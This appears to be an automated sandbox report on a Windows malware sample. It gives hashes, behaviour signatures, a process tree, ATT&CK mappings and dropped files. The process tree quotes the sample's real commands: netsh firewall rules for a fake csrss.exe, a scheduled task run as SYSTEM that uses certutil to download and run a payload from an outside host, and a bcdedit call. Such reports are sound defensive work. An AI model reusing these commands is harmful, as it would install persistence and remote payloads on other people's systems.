Overview

overview

10

Static

static

cf9f6fd53b...b5.exe

windows7_x64

10

cf9f6fd53b...b5.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    32s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-05-2022 21:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe

  • Size

    3.9MB

  • MD5

    865660822e59b4e6dfbbc1558adc33bf

  • SHA1

    327c98174279ecdd472ad263748723207293b704

  • SHA256

    cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5

  • SHA512

    4bfe2015c0d4d4c5ed1fa5860a207e635e8ea8bd639a47680a477ece2b861a7b83f227e5e5ec96145ff23784cdbf9fcd3e940c7af4d396ac66fa02be30835d17

Score
10/10
evasion

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
    "C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4724
    • C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
      "C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4440
      • C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
        "C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe
          "C:\Users\Admin\AppData\Local\Temp\cf9f6fd53b9d9ea86f78171f668c7bc1df8aed394ff5cf4b41ced05cbce014b5.exe"
          4⤵
            PID:4580
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
                PID:3600
              • C:\Windows\system32\cmd.exe
                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
                5⤵
                  PID:4140
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe ""
                  5⤵
                    PID:1308
                    • C:\Windows\rss\csrss.exe
                      C:\Windows\rss\csrss.exe ""
                      6⤵
                        PID:4768
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotgifts.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                          7⤵
                          • Creates scheduled task(s)
                          PID:4536
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                          7⤵
                          • Creates scheduled task(s)
                          PID:4648
                        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                          7⤵
                            PID:1176
                          • C:\Windows\system32\bcdedit.exe
                            C:\Windows\Sysnative\bcdedit.exe /v
                            7⤵
                            • Modifies boot configuration data using bcdedit
                            PID:1656
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                1⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4308
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                1⤵
                  PID:3176
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
                  1⤵
                    PID:4560

                  Network

                  MITRE ATT&CK Matrix ATT&CK v6

                  Initial Access

                  Execution

                  Scheduled Task

                  1
                  T1053

                  Persistence

                  Modify Existing Service

                  1
                  T1031

                  Scheduled Task

                  1
                  T1053

                  Privilege Escalation

                  Scheduled Task

                  1
                  T1053

                  Defense Evasion

                  Credential Access

                  Discovery

                  Lateral Movement

                  Collection

                  Exfiltration

                  Command and Control

                  Impact

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    Filesize

                    451KB

                    MD5

                    a8141c48a5c4d6fa922a48ea52f2dfa1

                    SHA1

                    5fbf2a15ba1fa73c2e8dd9fa6a5788d46878fa29

                    SHA256

                    79d74fe2cde63003726ac36009806c3132101e6e91781a68ac73ff21d91cb547

                    SHA512

                    41861acb5e56b46efd8d5e921036e5d63e6f53306c815d57cfbc4ea2a4c0fe4a38f755c85798b0d35318497227a4344df3febfd27a1dadc16aeba8cfcd1f8b28

                    Download Submit
                  • C:\Windows\rss\csrss.exe
                    Filesize

                    548KB

                    MD5

                    c5332ac2123f881a0706cb3c00159805

                    SHA1

                    dce70dafe3920350e3d71f2cbd6b9a02a69b66c1

                    SHA256

                    90e59203d3aafb2e3700a05a3947350be1eac5ac0db9acbc0b47dc21c27562c7

                    SHA512

                    f97cc405c275e8281864a9d67823d918c4ff92200f81934c7a886a78056a2879eb43f44fc180e55ddd5de70937be6ad3d4d8216c38e61f3262494a7c59144125

                    Download Submit
                  • C:\Windows\rss\csrss.exe
                    Filesize

                    581KB

                    MD5

                    a3ad9497b6c0cfad8f404d6857c9bcac

                    SHA1

                    cbe94f26690d735d2b8939aa4410501b65dc4d37

                    SHA256

                    715560cf4950ae3fcfbb87c849670166f1abf18a0ff5048ec5c3ad837c967b85

                    SHA512

                    206b7a4b0f7ffa946ae115d1c2ffccd1553647c74de510ffe063cb309f4ce0b0bd49ddc019e33e058e68bea669c21a852d079bc4dbd0ab428fb0d1b86383de71

                    Download Submit
                  • C:\Windows\rss\csrss.exe
                    Filesize

                    486KB

                    MD5

                    364a6e67d4dc7f6c2c10394690b67d13

                    SHA1

                    cf0a083d8eabe8d7e4ebee5fc17c59640758e3aa

                    SHA256

                    3b671ed045aaa7f3128e9c7e32bbb84dd710810c7833322b3accb484f13426b8

                    SHA512

                    f95db26c1ad2908090c73142d90efae9c3b64dccfe95881cb37f447cc8761e2ade3e32c29cb02bcc83c2e21e5be7612923e25321e499731c087422074448d5c3

                    Download Submit
                  • memory/1176-160-0x0000000000000000-mapping.dmp
                    Download
                  • memory/1308-155-0x0000000002A00000-0x0000000002DA6000-memory.dmp
                    Filesize

                    3.6MB

                    Download
                  • memory/1308-148-0x0000000000000000-mapping.dmp
                    Download
                  • memory/1656-162-0x0000000000000000-mapping.dmp
                    Download
                  • memory/2684-137-0x0000000000000000-mapping.dmp
                    Download
                  • memory/2684-138-0x0000000002597000-0x000000000293D000-memory.dmp
                    Filesize

                    3.6MB

                    Download
                  • memory/3176-144-0x0000000000000000-mapping.dmp
                    Download
                  • memory/3600-143-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4140-145-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4440-133-0x0000000000400000-0x0000000000B0F000-memory.dmp
                    Filesize

                    7.1MB

                    Download
                  • memory/4440-131-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4440-136-0x0000000000400000-0x0000000000B0F000-memory.dmp
                    Filesize

                    7.1MB

                    Download
                  • memory/4440-135-0x0000000000400000-0x0000000000B0F000-memory.dmp
                    Filesize

                    7.1MB

                    Download
                  • memory/4536-158-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4560-146-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4580-147-0x0000000000400000-0x0000000000B0F000-memory.dmp
                    Filesize

                    7.1MB

                    Download
                  • memory/4580-139-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4648-157-0x0000000000000000-mapping.dmp
                    Download
                  • memory/4724-130-0x00000000026A6000-0x0000000002A4C000-memory.dmp
                    Filesize

                    3.6MB

                    Download
                  • memory/4724-132-0x0000000002A50000-0x0000000003145000-memory.dmp
                    Filesize

                    7.0MB

                    Download
                  • memory/4768-159-0x0000000000400000-0x0000000000B0F000-memory.dmp
                    Filesize

                    7.1MB

                    Download
                  • memory/4768-151-0x0000000000000000-mapping.dmp
                    Download